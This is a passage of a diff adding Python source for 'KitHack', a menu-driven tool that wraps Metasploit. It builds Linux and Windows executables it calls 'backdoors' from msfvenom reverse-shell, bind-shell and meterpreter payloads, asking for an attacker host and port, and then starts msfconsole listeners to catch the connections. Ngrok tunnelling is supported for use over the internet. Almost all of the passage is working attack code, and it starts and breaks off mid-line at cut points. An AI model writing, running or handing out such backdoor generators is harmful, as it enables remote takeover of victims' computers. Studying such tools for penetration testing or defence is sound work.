{1}LINUX {0}--> {2}Kithack.elf'.format(WHITE, YELLOW, RED)) + print('{0}[02] {1}WINDOWS {0}--> {2}Kithack.exe'.format(WHITE, YELLOW, RED)) + print('{0}[03] {1}ANDROID {0}--> {2}Kithack.apk'.format(WHITE, YELLOW, RED)) + print('{0}[04] {1}MAC OS {0}--> {2}Kithack.macho'.format(WHITE, YELLOW, RED)) + print('{0}[05] {1}PHP {0}--> {2}Kithack.php'.format(WHITE, YELLOW, RED)) + print('{0}[06] {1}PYTHON {0}--> {2}Kithack.py'.format(WHITE, YELLOW, RED)) + print('{0}[07] {1}BASH {0}--> {2}Kithack.sh'.format(WHITE, YELLOW, RED)) + print('{0}[08] {1}PERL {0}--> {2}Kithack.pl'.format(WHITE, YELLOW, RED)) + print('{0}[09] {1}RUN MSFCONSOLE {0}'.format(WHITE, YELLOW)) + print('{0} [0] {1}Back'.format(WHITE, YELLOW)) + + sys = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + sys = sys.zfill(2) + + if sys == '00': + os.system('clear') + main() + + elif sys == '01': + print('{0}\n[*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) + print( + '{0}[01]{1} linux/x64/meterpreter_reverse_http'.format(WHITE, YELLOW)) + print( + '{0}[02]{1} linux/x64/meterpreter_reverse_https'.format(WHITE, YELLOW)) + print( + '{0}[03]{1} linux/x64/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) + print( + '{0}[04]{1} linux/x64/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) + print('{0}[05]{1} linux/x64/shell_bind_tcp'.format(WHITE, YELLOW)) + print('{0}[06]{1} linux/x64/shell_reverse_tcp'.format(WHITE, YELLOW)) + print( + '{0}[07]{1} linux/x86/meterpreter_reverse_http'.format(WHITE, YELLOW)) + print( + '{0}[08]{1} linux/x86/meterpreter_reverse_https'.format(WHITE, YELLOW)) + print( + '{0}[09]{1} linux/x86/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) + print( + '{0}[10]{1} linux/x86/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) + print('{0}[11]{1} linux/x86/shell_bind_tcp'.format(WHITE, YELLOW)) + print('{0}[12]{1} linux/x86/shell_reverse_tcp'.format(WHITE, YELLOW)) + + pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + pay = pay.zfill(2) + + if pay == '01': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] AN ERROR HAS OCCURED WHILST GENERATING THE PAYLOAD\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '02': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '03': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '04': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '05': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p linux/x64/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '06': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p linux/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '07': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_http; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '08': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_https; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '09': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '10': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '11': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p linux/x86/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_bind_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/shell_bind_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '12': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p linux/x86/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/shell_reverse_tcp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + elif sys == '02': + print('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) + print( + '{0}[01]{1} windows/x64/meterpreter_reverse_http'.format(WHITE, YELLOW)) + print( + '{0}[02]{1} windows/x64/meterpreter_reverse_https'.format(WHITE, YELLOW)) + print( + '{0}[03]{1} windows/x64/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) + print( + '{0}[04]{1} windows/x64/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) + print( + '{0}[05]{1} windows/x64/powershell_reverse_tcp'.format(WHITE, YELLOW)) + print('{0}[06]{1} windows/x64/shell_reverse_tcp'.format(WHITE, YELLOW)) + print( + '{0}[07]{1} windows/meterpreter_reverse_http'.format(WHITE, YELLOW)) + print( + '{0}[08]{1} windows/meterpreter_reverse_https'.format(WHITE, YELLOW)) + print( + '{0}[09]{1} windows/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) + print( + '{0}[10]{1} windows/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) + print( + '{0}[11]{1} windows/meterpreter/reverse_tcp_dns'.format(WHITE, YELLOW)) + print('{0}[12]{1} windows/metsvc_reverse_tcp'.format(WHITE, YELLOW)) + print('{0}[13]{1} windows/powershell_reverse_tcp'.format(WHITE, YELLOW)) + print('{0}[14]{1} windows/shell_reverse_tcp'.format(WHITE, YELLOW)) + + pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + pay = pay.zfill(2) + + if pay == '01': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_http; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '02': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p windows/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 